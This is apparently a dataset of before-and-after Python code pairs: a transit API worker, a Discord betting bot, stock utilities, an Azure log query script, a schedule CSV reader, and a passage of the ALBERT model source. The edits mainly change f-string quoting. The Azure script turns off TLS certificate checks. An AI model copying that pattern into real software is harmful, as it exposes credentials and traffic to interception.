{ri4key}") ri4data = self.data.ri4keys[ri4key] api = slapi_ri4(ri4key, 60) for stop in ','.join(set(ri4data["stops"].split(','))).split(','): logger.debug(f"[process_ri4] Processing stop {stop}") newdata = self.data.ri4[stop] # TODO: CHECK FOR FRESHNESS TO NOT KILL OFF THE KEYS try: departures = [] departuredata = await api.request(stop) departuredata = departuredata['ResponseData'] for (i, traffictype) in enumerate(['Metros', 'Buses', 'Trains', 'Trams', 'Ships']): for (idx, value) in enumerate( departuredata[traffictype]): direction = value['JourneyDirection'] or 0 displaytime = value['DisplayTime'] or '' destination = value['Destination'] or '' linenumber = value['LineNumber'] or '' expected = value['ExpectedDateTime'] or '' groupofline = value['GroupOfLine'] or '' icon = iconswitcher.get(traffictype, 'mdi:train-car') diff = self.parseDepartureTime(displaytime) departures.append({ 'line': linenumber, 'direction': direction, 'departure': displaytime, 'destination': destination, 'time': diff, 'expected': datetime.strptime( expected, '%Y-%m-%dT%H:%M:%S' ), 'type': traffictype, 'groupofline': groupofline, 'icon': icon, }) newdata['data'] = sorted(departures, key=lambda k: k['time']) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_ri4] Stop {stop} updated sucessfully") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_ri4] Error occured during update {stop}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.ri4[stop] = newdata logger.debug(f"[process_ri4] Completed stop {stop}") logger.debug(f"[process_ri4] Completed key {ri4key}") logger.debug("[process_ri4] Completed") return async def assert_tl2(self, key): logger.debug("[assert_tl2] Entered") if key not in self.data.tl2: logger.debug("[assert_tl2] Registering key") self.data.tl2[key] = { "api_type": "slapi-tl2", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } else: logger.debug("[assert_tl2] Key already present") logger.debug("[assert_tl2] Completed") return async def process_tl2(self, notarealarg=None): logger.debug("[process_tl2] Entered") for tl2key in list(self.data.tl2): logger.debug(f"[process_tl2] Processing {tl2key}") newdata = self.data.tl2[tl2key] statuses = { 'EventGood': 'Good', 'EventMinor': 'Minor', 'EventMajor': 'Closed', 'EventPlanned': 'Planned', } # Icon table used for HomeAssistant. statusIcons = { 'EventGood': 'mdi:check', 'EventMinor': 'mdi:clock-alert-outline', 'EventMajor': 'mdi:close', 'EventPlanned': 'mdi:triangle-outline' } try: api = slapi_tl2(tl2key) apidata = await api.request() apidata = apidata['ResponseData']['TrafficTypes'] responselist = {} for response in apidata: statustype = ('ferry' if response['Type'] == 'fer' else response['Type']) for event in response['Events']: event['Status'] = statuses.get(event['StatusIcon']) event['StatusIcon'] = \ statusIcons.get(event['StatusIcon']) responsedata = { 'status': statuses.get(response['StatusIcon']), 'status_icon': statusIcons.get(response['StatusIcon']), 'events': response['Events'] } responselist[statustype] = responsedata # Attribution and update sensor data. 
newdata['data'] = responselist newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_tl2] Update of {tl2key} succeeded") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_tl2] Update of {tl2key} failed") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.tl2[tl2key] = newdata logger.debug(f"[process_tl2] Completed {tl2key}") logger.debug("[process_tl2] Completed") return
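For orientation: the edited and original HASL worker rows above appear to differ only in how dictionary keys are quoted inside f-string replacement fields (for example leg["Origin"]["date"] versus leg['Origin']['date']). The sketch below contrasts the two forms with a hypothetical leg payload; the same-quote form in the last assignment only parses on Python 3.12+ (PEP 701), while the mixed-quote form works on any Python with f-strings.

# Hypothetical payload, for illustration only.
leg = {"Origin": {"date": "2021-09-14", "time": "08:15"}}

# original_code style: single quotes nested inside a double-quoted f-string (any Python 3.6+).
time_old = f"{leg['Origin']['date']} {leg['Origin']['time']}"

# edited_code style: the outer quote reused inside the replacement field (Python 3.12+, PEP 701).
time_new = f"{leg["Origin"]["date"]} {leg["Origin"]["time"]}"

assert time_old == time_new == "2021-09-14 08:15"

The same quote flip recurs in the remaining row pairs below.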
from discord.ext import commands from discord_slash import SlashContext, cog_ext import sqlite3 import random from discord_slash.model import SlashCommandOptionType from discord_slash.utils.manage_commands import create_choice, create_option class Fun(commands.Cog): def __init__(self, bot): self.bot = bot self._last_member = None @cog_ext.cog_slash(name="roll",description="roll a dice") async def roll(self,ctx:SlashContext, number_of_dice: int, number_of_sides: int,hidden: bool = False): dice = [ str(random.choice(range(1, number_of_sides + 1))) for _ in range(number_of_dice) ] await ctx.send(", ".join(dice),hidden=hidden) @cog_ext.cog_slash(name="coinflip",description="flip a coin",options=[ create_option("hidden",description="Whether to show the output of the message in chat",option_type=SlashCommandOptionType.BOOLEAN,required=False), create_option("bet",description="How much you want to bet on the coin",option_type=SlashCommandOptionType.INTEGER,required=False), create_option("choice",description="Which side you think the coin will land on",option_type=SlashCommandOptionType.STRING,required=False,choices=[ create_choice(name="Heads",value="h"), create_choice(name="Tails",value="t"), ]) ]) async def coinflip(self,ctx:SlashContext,hidden:bool=True,bet:int=0,choice:str="ha"): coin = "heads" if random.choice((0,1)) == 0 else "tails" # await ctx.send(f"It landed on {coin}!" + ("" if choice == "ha" else f"\n\nYou were {"right" if choice == coin[0] else "wrong"}!"),hidden=hidden) default = len(choice) == 2 choice = choice[0] betmsg = "" if bet: if abs(bet) != bet: await ctx.send("You cannot bet a negative amount!",hidden=True) return con = sqlite3.connect("users.db") money = list(con.execute("SELECT money FROM users WHERE id = ?",(ctx.author_id,)))[0][0] if bet > money: await ctx.send("You are betting money you don't have!",hidden=True) return con.execute("UPDATE users SET money = ? WHERE id = ?",(money + (bet * (1 if choice == coin[0] else -1)),str(ctx.author_id))) con.commit() betmsg = f"\n\n{"+" if choice == coin[0] else "-"}<a:goldcoin:801148801653276693>{bet}." await ctx.send(f"It landed on {coin}!" + ("" if default and not bet else f"\n\nYou were {"right" if choice == coin[0] else "wrong"}!") + betmsg,hidden=hidden) @cog_ext.cog_slash(name="jack",description="show jack") async def jack(self,ctx:SlashContext): await ctx.send("""\ <:jack1:887072181262123090><:jack2:887072180951724103> <:jack4:887072181442457641><:jack5:887072180544884747><:jack6:887072180679114782> <:jack7:887072181262123088><:jack8:887072181752823858><:jack9:887072181505359893>""".replace(" ","")) if __name__ == "__main__": import main
from discord.ext import commands from discord_slash import SlashContext, cog_ext import sqlite3 import random from discord_slash.model import SlashCommandOptionType from discord_slash.utils.manage_commands import create_choice, create_option class Fun(commands.Cog): def __init__(self, bot): self.bot = bot self._last_member = None @cog_ext.cog_slash(name="roll",description="roll a dice") async def roll(self,ctx:SlashContext, number_of_dice: int, number_of_sides: int,hidden: bool = False): dice = [ str(random.choice(range(1, number_of_sides + 1))) for _ in range(number_of_dice) ] await ctx.send(", ".join(dice),hidden=hidden) @cog_ext.cog_slash(name="coinflip",description="flip a coin",options=[ create_option("hidden",description="Whether to show the output of the message in chat",option_type=SlashCommandOptionType.BOOLEAN,required=False), create_option("bet",description="How much you want to bet on the coin",option_type=SlashCommandOptionType.INTEGER,required=False), create_option("choice",description="Which side you think the coin will land on",option_type=SlashCommandOptionType.STRING,required=False,choices=[ create_choice(name="Heads",value="h"), create_choice(name="Tails",value="t"), ]) ]) async def coinflip(self,ctx:SlashContext,hidden:bool=True,bet:int=0,choice:str="ha"): coin = "heads" if random.choice((0,1)) == 0 else "tails" # await ctx.send(f"It landed on {coin}!" + ("" if choice == "ha" else f"\n\nYou were {'right' if choice == coin[0] else 'wrong'}!"),hidden=hidden) default = len(choice) == 2 choice = choice[0] betmsg = "" if bet: if abs(bet) != bet: await ctx.send("You cannot bet a negative amount!",hidden=True) return con = sqlite3.connect("users.db") money = list(con.execute("SELECT money FROM users WHERE id = ?",(ctx.author_id,)))[0][0] if bet > money: await ctx.send("You are betting money you don't have!",hidden=True) return con.execute("UPDATE users SET money = ? WHERE id = ?",(money + (bet * (1 if choice == coin[0] else -1)),str(ctx.author_id))) con.commit() betmsg = f"\n\n{'+' if choice == coin[0] else '-'}<a:goldcoin:801148801653276693>{bet}." await ctx.send(f"It landed on {coin}!" + ("" if default and not bet else f"\n\nYou were {'right' if choice == coin[0] else 'wrong'}!") + betmsg,hidden=hidden) @cog_ext.cog_slash(name="jack",description="show jack") async def jack(self,ctx:SlashContext): await ctx.send("""\ <:jack1:887072181262123090><:jack2:887072180951724103> <:jack4:887072181442457641><:jack5:887072180544884747><:jack6:887072180679114782> <:jack7:887072181262123088><:jack8:887072181752823858><:jack9:887072181505359893>""".replace(" ","")) if __name__ == "__main__": import main
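In the coinflip pair the textual change is again the quote style inside f-string fields; the betting logic itself is untouched. A self-contained sketch of that settlement step, assuming the users(id, money) table the sample queries (hypothetical database path, illustration only):

import sqlite3

def settle_bet(db_path: str, user_id: str, bet: int, won: bool) -> int:
    # Apply a won or lost bet to a user's balance and return the new balance.
    con = sqlite3.connect(db_path)
    try:
        (money,) = con.execute(
            "SELECT money FROM users WHERE id = ?", (user_id,)
        ).fetchone()
        new_balance = money + bet if won else money - bet
        con.execute(
            "UPDATE users SET money = ? WHERE id = ?", (new_balance, user_id)
        )
        con.commit()
        return new_balance
    finally:
        con.close()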
BIL = 1000*1000*1000 class C: COL_GIA3 = 3 COL_VOL3 = 4 COL_GIA2 = 5 COL_VOL2 = 6 COL_GIA1 = 7 COL_VOL1 = 8 COL_GIA = 9 COL_VOL = 10 COL_GIA1b = 12 COL_VOL1b = 13 COL_GIA2b = 14 COL_VOL2b = 15 COL_GIA3b = 16 COL_VOL3b = 17 COL_TOTAL_VOL = 18 COL_AVG_PRICE = 21 COL_HIGH = 22 COL_LOW = 23 NN_BUY = 24 NN_SELL = 25 DATA_2_PLOT_RATIO = 100000 CTIME = "times" CBUYP = "buyPressure" CSELLP = "sellPressure" CHOSE="hoseSnapShot" LOCAL="local" def exec3(cmd): # #print(f"****\n running: {cmd} ****") import subprocess process = subprocess.Popen(cmd.split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = process.communicate() # print (stdout.decode("utf-8"), stderr.decode("utf-8")) return stdout.decode("utf-8"), f"""error code: {stderr.decode("utf-8")}""" def threading_func_wrapper(func, delay=0.5, args=None, start=True): import threading if args is None: func_thread = threading.Timer(delay, func) else: func_thread = threading.Timer(delay, func, (args,)) if start: func_thread.start() return func_thread def mmap(*args): return list(map(*args)) def dump(history): from CONSTANT import OUTPUT_PICKLE_FILENAME import pickle n= len(history) if n == 0: return if not n % 50 == 0: return with open(OUTPUT_PICKLE_FILENAME, "wb") as file: pickle.dump(history, file) lastWrite = history[-1] def load(): from CONSTANT import OUTPUT_PICKLE_FILENAME import pickle with open(OUTPUT_PICKLE_FILENAME, "rb") as file: return pickle.load(file) data = load() #%%
BIL = 1000*1000*1000 class C: COL_GIA3 = 3 COL_VOL3 = 4 COL_GIA2 = 5 COL_VOL2 = 6 COL_GIA1 = 7 COL_VOL1 = 8 COL_GIA = 9 COL_VOL = 10 COL_GIA1b = 12 COL_VOL1b = 13 COL_GIA2b = 14 COL_VOL2b = 15 COL_GIA3b = 16 COL_VOL3b = 17 COL_TOTAL_VOL = 18 COL_AVG_PRICE = 21 COL_HIGH = 22 COL_LOW = 23 NN_BUY = 24 NN_SELL = 25 DATA_2_PLOT_RATIO = 100000 CTIME = "times" CBUYP = "buyPressure" CSELLP = "sellPressure" CHOSE="hoseSnapShot" LOCAL="local" def exec3(cmd): # #print(f"****\n running: {cmd} ****") import subprocess process = subprocess.Popen(cmd.split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = process.communicate() # print (stdout.decode("utf-8"), stderr.decode("utf-8")) return stdout.decode("utf-8"), f"""error code: {stderr.decode("utf-8")}""" def threading_func_wrapper(func, delay=0.5, args=None, start=True): import threading if args is None: func_thread = threading.Timer(delay, func) else: func_thread = threading.Timer(delay, func, (args,)) if start: func_thread.start() return func_thread def mmap(*args): return list(map(*args)) def dump(history): from CONSTANT import OUTPUT_PICKLE_FILENAME import pickle n= len(history) if n == 0: return if not n % 50 == 0: return with open(OUTPUT_PICKLE_FILENAME, "wb") as file: pickle.dump(history, file) lastWrite = history[-1] def load(): from CONSTANT import OUTPUT_PICKLE_FILENAME import pickle with open(OUTPUT_PICKLE_FILENAME, "rb") as file: return pickle.load(file) data = load() #%%
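The two utility-module rows above appear to be identical. For context, their threading_func_wrapper helper is a thin wrapper over threading.Timer; a usage sketch with a hypothetical callback and symbol name (illustration only):

import threading

def threading_func_wrapper(func, delay=0.5, args=None, start=True):
    # Schedule func to run once on a timer thread after `delay` seconds.
    if args is None:
        func_thread = threading.Timer(delay, func)
    else:
        func_thread = threading.Timer(delay, func, (args,))
    if start:
        func_thread.start()
    return func_thread

def poll_snapshot(symbol):
    print(f"polling {symbol}")

# Fires poll_snapshot("VNM") about two seconds from now; timer.cancel() aborts it while pending.
timer = threading_func_wrapper(poll_snapshot, delay=2.0, args="VNM")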
#import modules region import requests, urllib3, json import pandas as pd from pandas.io.json import json_normalize from datetime import datetime from datetime import timedelta import plotly.express as px import re #variables region workspaceid = '<>' # Tenant ID for your Azure subscription TENANT_ID = '<>' # Your service principal App ID CLIENT = '<>' # Your service principal password KEY = '<>' loginURL = "https://login.microsoftonline.com/" + TENANT_ID + "/oauth2/token" resource = "https://api.loganalytics.io" url = "https://api.loganalytics.io/v1/workspaces/" + workspaceid + "/query" StartDateTime = datetime.strptime('2020-10-22 00:00:00', '%Y-%m-%d %H:%M:%S') StartDateTime = StartDateTime + timedelta(hours=4) EndDateTime = datetime.strptime('2020-10-30 00:00:00', '%Y-%m-%d %H:%M:%S') EndDateTime = EndDateTime + timedelta(hours=4) servername = '<>' #saving query parameters to the array of query dicts queryParam = [ { 'Computer':servername, 'CounterName':'% Privileged Time', 'ObjectName':'Processor', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'% User Time', 'ObjectName':'Processor', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'Processor Queue Length', 'ObjectName':'System', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'Available Bytes', 'ObjectName':'Memory', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'Pages/sec', 'ObjectName':'Memory', 'InstanceName':'' } ] #get authorizartion token function def get_token(url, resource, Username, Password): payload = { 'grant_type': 'client_credentials', 'client_id': Username, 'client_secret': Password, 'Content_Type': 'x-www-form-urlencoded', 'resource': resource, } urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) ApiReturn = requests.post(url, data=payload, verify=False) ApiToken = json.loads(ApiReturn.content)["access_token"] return { "Authorization": str("Bearer "+ ApiToken), 'Content-Type': 'application/json'} def createQueries(queryParam): #creating array for queries queries = [] #iterating through list of query parameters dicts for query in queryParam: if query['InstanceName']: queries.append((f"Perf | where TimeGenerated between(datetime({StartDateTime}) .. datetime({EndDateTime})) " f"and Computer == '{query["Computer"]}' and CounterName == '{query["CounterName"]}' " f"and ObjectName == '{query["ObjectName"]}' and InstanceName == '{query["InstanceName"]}' " "| extend ET_TimeGenerated = TimeGenerated - 4h " "| project Computer, ObjectName, CounterName, InstanceName, CounterValue, TimeGenerated, ET_TimeGenerated")) else: queries.append((f"Perf | where TimeGenerated between(datetime({StartDateTime}) .. 
datetime({EndDateTime})) " f"and Computer == '{query["Computer"]}' and CounterName == '{query["CounterName"]}' " f"and ObjectName == '{query["ObjectName"]}' " "| extend ET_TimeGenerated = TimeGenerated - 4h " "| project Computer, ObjectName, CounterName, InstanceName, CounterValue, TimeGenerated, ET_TimeGenerated")) return queries def getlogdata(query): #getting auth token to use with request Headers = get_token(loginURL, resource, CLIENT, KEY) params = { "query": query } result = requests.get(url, params=params, headers=Headers, verify=False) print(f"REST API request: {result}") JSONContent = result.json() columns = len(result.json()['tables'][0]['columns']) dtcolumns =[] for column in range(0,columns): dtcolumns.append(result.json()['tables'][0]['columns'][column]['name']) dtrows =[] dtrows = (result.json()['tables'][0]['rows']) df=pd.DataFrame(dtrows) df= pd.DataFrame(dtrows, columns=dtcolumns) df.sort_values(by=['ET_TimeGenerated'],inplace=True) if {'CounterValueMB'}.issubset(df.columns): df.drop(columns=['CounterValue'],inplace=True) df.rename(columns={"CounterValueMB":"CounterValue"},inplace=True) return df def drawgraph(df): figtitle = servername + " - " + df['ObjectName'][0] + " - " + df['CounterName'][0] print(f"Now working on: {figtitle}") now = datetime.now() now = now.strftime("%d-%m-%Y-%H-%M-%S") if(df['InstanceName'][0]): lineColor = 'InstanceName' else: lineColor = 'CounterName' fileName = re.sub('[^a-zA-Z0-9\n\.]','',df['CounterName'][0]) filepath = "/Users/Temp/PY/" + fileName + "-" + now +".html" fig = px.line(df, x = 'ET_TimeGenerated', y = 'CounterValue', title=figtitle, color=lineColor) fig.write_html(filepath) queries = createQueries(queryParam) for qstr in queries: df = getlogdata(qstr) df.reset_index(drop = True, inplace = True) drawgraph(df) now = datetime.now() now = now.strftime("%d-%m-%Y-%H-%M-%S") fileName = re.sub('[^a-zA-Z0-9\n\.]','',df['CounterName'][0]) filepath = "/Users/Temp/PY/" + fileName + "-" + now +".csv" df.to_csv(filepath)
#import modules region import requests, urllib3, json import pandas as pd from pandas.io.json import json_normalize from datetime import datetime from datetime import timedelta import plotly.express as px import re #variables region workspaceid = '<>' # Tenant ID for your Azure subscription TENANT_ID = '<>' # Your service principal App ID CLIENT = '<>' # Your service principal password KEY = '<>' loginURL = "https://login.microsoftonline.com/" + TENANT_ID + "/oauth2/token" resource = "https://api.loganalytics.io" url = "https://api.loganalytics.io/v1/workspaces/" + workspaceid + "/query" StartDateTime = datetime.strptime('2020-10-22 00:00:00', '%Y-%m-%d %H:%M:%S') StartDateTime = StartDateTime + timedelta(hours=4) EndDateTime = datetime.strptime('2020-10-30 00:00:00', '%Y-%m-%d %H:%M:%S') EndDateTime = EndDateTime + timedelta(hours=4) servername = '<>' #saving query parameters to the array of query dicts queryParam = [ { 'Computer':servername, 'CounterName':'% Privileged Time', 'ObjectName':'Processor', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'% User Time', 'ObjectName':'Processor', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'Processor Queue Length', 'ObjectName':'System', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'Available Bytes', 'ObjectName':'Memory', 'InstanceName':'' }, { 'Computer':servername, 'CounterName':'Pages/sec', 'ObjectName':'Memory', 'InstanceName':'' } ] #get authorizartion token function def get_token(url, resource, Username, Password): payload = { 'grant_type': 'client_credentials', 'client_id': Username, 'client_secret': Password, 'Content_Type': 'x-www-form-urlencoded', 'resource': resource, } urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) ApiReturn = requests.post(url, data=payload, verify=False) ApiToken = json.loads(ApiReturn.content)["access_token"] return { "Authorization": str("Bearer "+ ApiToken), 'Content-Type': 'application/json'} def createQueries(queryParam): #creating array for queries queries = [] #iterating through list of query parameters dicts for query in queryParam: if query['InstanceName']: queries.append((f"Perf | where TimeGenerated between(datetime({StartDateTime}) .. datetime({EndDateTime})) " f"and Computer == '{query['Computer']}' and CounterName == '{query['CounterName']}' " f"and ObjectName == '{query['ObjectName']}' and InstanceName == '{query['InstanceName']}' " "| extend ET_TimeGenerated = TimeGenerated - 4h " "| project Computer, ObjectName, CounterName, InstanceName, CounterValue, TimeGenerated, ET_TimeGenerated")) else: queries.append((f"Perf | where TimeGenerated between(datetime({StartDateTime}) .. 
datetime({EndDateTime})) " f"and Computer == '{query['Computer']}' and CounterName == '{query['CounterName']}' " f"and ObjectName == '{query['ObjectName']}' " "| extend ET_TimeGenerated = TimeGenerated - 4h " "| project Computer, ObjectName, CounterName, InstanceName, CounterValue, TimeGenerated, ET_TimeGenerated")) return queries def getlogdata(query): #getting auth token to use with request Headers = get_token(loginURL, resource, CLIENT, KEY) params = { "query": query } result = requests.get(url, params=params, headers=Headers, verify=False) print(f"REST API request: {result}") JSONContent = result.json() columns = len(result.json()['tables'][0]['columns']) dtcolumns =[] for column in range(0,columns): dtcolumns.append(result.json()['tables'][0]['columns'][column]['name']) dtrows =[] dtrows = (result.json()['tables'][0]['rows']) df=pd.DataFrame(dtrows) df= pd.DataFrame(dtrows, columns=dtcolumns) df.sort_values(by=['ET_TimeGenerated'],inplace=True) if {'CounterValueMB'}.issubset(df.columns): df.drop(columns=['CounterValue'],inplace=True) df.rename(columns={"CounterValueMB":"CounterValue"},inplace=True) return df def drawgraph(df): figtitle = servername + " - " + df['ObjectName'][0] + " - " + df['CounterName'][0] print(f"Now working on: {figtitle}") now = datetime.now() now = now.strftime("%d-%m-%Y-%H-%M-%S") if(df['InstanceName'][0]): lineColor = 'InstanceName' else: lineColor = 'CounterName' fileName = re.sub('[^a-zA-Z0-9\n\.]','',df['CounterName'][0]) filepath = "/Users/Temp/PY/" + fileName + "-" + now +".html" fig = px.line(df, x = 'ET_TimeGenerated', y = 'CounterValue', title=figtitle, color=lineColor) fig.write_html(filepath) queries = createQueries(queryParam) for qstr in queries: df = getlogdata(qstr) df.reset_index(drop = True, inplace = True) drawgraph(df) now = datetime.now() now = now.strftime("%d-%m-%Y-%H-%M-%S") fileName = re.sub('[^a-zA-Z0-9\n\.]','',df['CounterName'][0]) filepath = "/Users/Temp/PY/" + fileName + "-" + now +".csv" df.to_csv(filepath)
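The Log Analytics pair changes only the quoting of dict keys inside the KQL f-strings; the response handling is the same in both rows. Both rebuild a DataFrame from the API's tables/columns/rows payload, sketched below with a hypothetical minimal response (illustration only):

import pandas as pd

# Minimal Log Analytics query response shape: one table with column metadata and row arrays.
payload = {
    "tables": [{
        "columns": [{"name": "ET_TimeGenerated"}, {"name": "CounterValue"}],
        "rows": [
            ["2020-10-22T04:01:00Z", 13.1],
            ["2020-10-22T04:00:00Z", 12.5],
        ],
    }]
}

table = payload["tables"][0]
df = pd.DataFrame(table["rows"], columns=[c["name"] for c in table["columns"]])
df.sort_values(by="ET_TimeGenerated", inplace=True)
print(df)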
import csv from datetime import datetime SCHEDULE = 'schedule.csv' HEADERS = ("Date", "Week", "Class", "Day", "Learning Outcome", "Chapter", "Pages", "Quiz", "Assignmt", "Lab", "Outcomes") OPTIONS_DATE = {1: "Specify a specific date", 2: "Use today's date"} def getDate(): # Determine current date and time of the device used. now = datetime.now() # Display date in the format return now.strftime('%Y-%m-%d') def getDateMANUAL(): print("\r\n\t\tHINT: Use the due date of the assignment.") year = input("\r\n\tEnter the year (YYYY): ") month = input("\r\n\tEnter the month (MM): ") day = input("\r\n\tEnter the day (DD): ") if len(day) != 2 or len(month) != 2 or len(year) != 4: print("\r\n\t\tERROR: Please enter the proper number of characters.") getDateMANUAL() else: return "-".join([year, month, day]) def getDateTime(): # Determine current date and time of the device used. now = datetime.now() # Display date and time in the format: YYYY-MM-DD H:M:S dateTime = now.strftime('%Y-%m-%d %H:%M:%S') return dateTime # A function that opens a CSV file to create and return a date-based list and # dictionary. def getSchedule(filename): with open(filename) as csv_file: csv_reader = csv.reader(csv_file, delimiter=',') line_count = 0 dates = [] datesDictionary = {} headers = "" for row in csv_reader: if line_count == 0: # print(f'Column names are {', '.join(row)}') headers = row # print(headers) line_count += 1 else: rowDictionary = {} for index in range(len(row)): cell = row[index] if len(cell) > 0: rowDictionary[headers[index]] = cell dateList = row[0].split("/") # SEE: https://docs.python.org/3/library/datetime.html?highlight=datetime#module-datetime # Given: MM/DD/YYYY, Required: YYYY-MM-DD mm = str(dateList[0]).zfill(2) dd = str(dateList[1]).zfill(2) dateString = "-".join([dateList[2], mm , dd]) dates.append(dateString) datesDictionary[dateString] = rowDictionary line_count += 1 return {"list": dates, "dictionary": datesDictionary} def scheduleCheck(date=getDate(), dates=[]): try: if dates.index(date) >= 0: return True except ValueError: return False
import csv from datetime import datetime SCHEDULE = 'schedule.csv' HEADERS = ("Date", "Week", "Class", "Day", "Learning Outcome", "Chapter", "Pages", "Quiz", "Assignmt", "Lab", "Outcomes") OPTIONS_DATE = {1: "Specify a specific date", 2: "Use today's date"} def getDate(): # Determine current date and time of the device used. now = datetime.now() # Display date in the format return now.strftime('%Y-%m-%d') def getDateMANUAL(): print("\r\n\t\tHINT: Use the due date of the assignment.") year = input("\r\n\tEnter the year (YYYY): ") month = input("\r\n\tEnter the month (MM): ") day = input("\r\n\tEnter the day (DD): ") if len(day) != 2 or len(month) != 2 or len(year) != 4: print("\r\n\t\tERROR: Please enter the proper number of characters.") getDateMANUAL() else: return "-".join([year, month, day]) def getDateTime(): # Determine current date and time of the device used. now = datetime.now() # Display date and time in the format: YYYY-MM-DD H:M:S dateTime = now.strftime('%Y-%m-%d %H:%M:%S') return dateTime # A function that opens a CSV file to create and return a date-based list and # dictionary. def getSchedule(filename): with open(filename) as csv_file: csv_reader = csv.reader(csv_file, delimiter=',') line_count = 0 dates = [] datesDictionary = {} headers = "" for row in csv_reader: if line_count == 0: # print(f'Column names are {", ".join(row)}') headers = row # print(headers) line_count += 1 else: rowDictionary = {} for index in range(len(row)): cell = row[index] if len(cell) > 0: rowDictionary[headers[index]] = cell dateList = row[0].split("/") # SEE: https://docs.python.org/3/library/datetime.html?highlight=datetime#module-datetime # Given: MM/DD/YYYY, Required: YYYY-MM-DD mm = str(dateList[0]).zfill(2) dd = str(dateList[1]).zfill(2) dateString = "-".join([dateList[2], mm , dd]) dates.append(dateString) datesDictionary[dateString] = rowDictionary line_count += 1 return {"list": dates, "dictionary": datesDictionary} def scheduleCheck(date=getDate(), dates=[]): try: if dates.index(date) >= 0: return True except ValueError: return False
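The schedule-reader pair differs only in the quoting inside a commented-out f-string; the interesting part of both rows is the manual MM/DD/YYYY to YYYY-MM-DD conversion via split and zfill. An equivalent conversion through datetime, as a sketch (illustration only):

from datetime import datetime

def to_iso(us_date: str) -> str:
    # Convert 'M/D/YYYY' (e.g. '9/7/2021') to ISO 'YYYY-MM-DD'.
    return datetime.strptime(us_date, "%m/%d/%Y").strftime("%Y-%m-%d")

assert to_iso("9/7/2021") == "2021-09-07"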
# coding=utf-8 # Copyright 2018 Google AI, Google Brain and the HuggingFace Inc. team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """PyTorch ALBERT model. """ import math import os from dataclasses import dataclass from typing import Optional, Tuple import torch from packaging import version from torch import nn from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss from ...activations import ACT2FN from ...file_utils import ( ModelOutput, add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward, replace_return_docstrings, ) from ...modeling_outputs import ( BaseModelOutput, BaseModelOutputWithPooling, MaskedLMOutput, MultipleChoiceModelOutput, QuestionAnsweringModelOutput, SequenceClassifierOutput, TokenClassifierOutput, ) from ...modeling_utils import ( PreTrainedModel, apply_chunking_to_forward, find_pruneable_heads_and_indices, prune_linear_layer, ) from ...utils import logging from .configuration_albert import AlbertConfig logger = logging.get_logger(__name__) _CHECKPOINT_FOR_DOC = "albert-base-v2" _CONFIG_FOR_DOC = "AlbertConfig" _TOKENIZER_FOR_DOC = "AlbertTokenizer" ALBERT_PRETRAINED_MODEL_ARCHIVE_LIST = [ "albert-base-v1", "albert-large-v1", "albert-xlarge-v1", "albert-xxlarge-v1", "albert-base-v2", "albert-large-v2", "albert-xlarge-v2", "albert-xxlarge-v2", # See all ALBERT models at https://huggingface.co/models?filter=albert ] def load_tf_weights_in_albert(model, config, tf_checkpoint_path): """Load tf checkpoints in a pytorch model.""" try: import re import numpy as np import tensorflow as tf except ImportError: logger.error( "Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see " "https://www.tensorflow.org/install/ for installation instructions." 
) raise tf_path = os.path.abspath(tf_checkpoint_path) logger.info(f"Converting TensorFlow checkpoint from {tf_path}") # Load weights from TF model init_vars = tf.train.list_variables(tf_path) names = [] arrays = [] for name, shape in init_vars: logger.info(f"Loading TF weight {name} with shape {shape}") array = tf.train.load_variable(tf_path, name) names.append(name) arrays.append(array) for name, array in zip(names, arrays): print(name) for name, array in zip(names, arrays): original_name = name # If saved from the TF HUB module name = name.replace("module/", "") # Renaming and simplifying name = name.replace("ffn_1", "ffn") name = name.replace("bert/", "albert/") name = name.replace("attention_1", "attention") name = name.replace("transform/", "") name = name.replace("LayerNorm_1", "full_layer_layer_norm") name = name.replace("LayerNorm", "attention/LayerNorm") name = name.replace("transformer/", "") # The feed forward layer had an 'intermediate' step which has been abstracted away name = name.replace("intermediate/dense/", "") name = name.replace("ffn/intermediate/output/dense/", "ffn_output/") # ALBERT attention was split between self and output which have been abstracted away name = name.replace("/output/", "/") name = name.replace("/self/", "/") # The pooler is a linear layer name = name.replace("pooler/dense", "pooler") # The classifier was simplified to predictions from cls/predictions name = name.replace("cls/predictions", "predictions") name = name.replace("predictions/attention", "predictions") # Naming was changed to be more explicit name = name.replace("embeddings/attention", "embeddings") name = name.replace("inner_group_", "albert_layers/") name = name.replace("group_", "albert_layer_groups/") # Classifier if len(name.split("/")) == 1 and ("output_bias" in name or "output_weights" in name): name = "classifier/" + name # No ALBERT model currently handles the next sentence prediction task if "seq_relationship" in name: name = name.replace("seq_relationship/output_", "sop_classifier/classifier/") name = name.replace("weights", "weight") name = name.split("/") # Ignore the gradients applied by the LAMB/ADAM optimizers. 
        if (
            "adam_m" in name
            or "adam_v" in name
            or "AdamWeightDecayOptimizer" in name
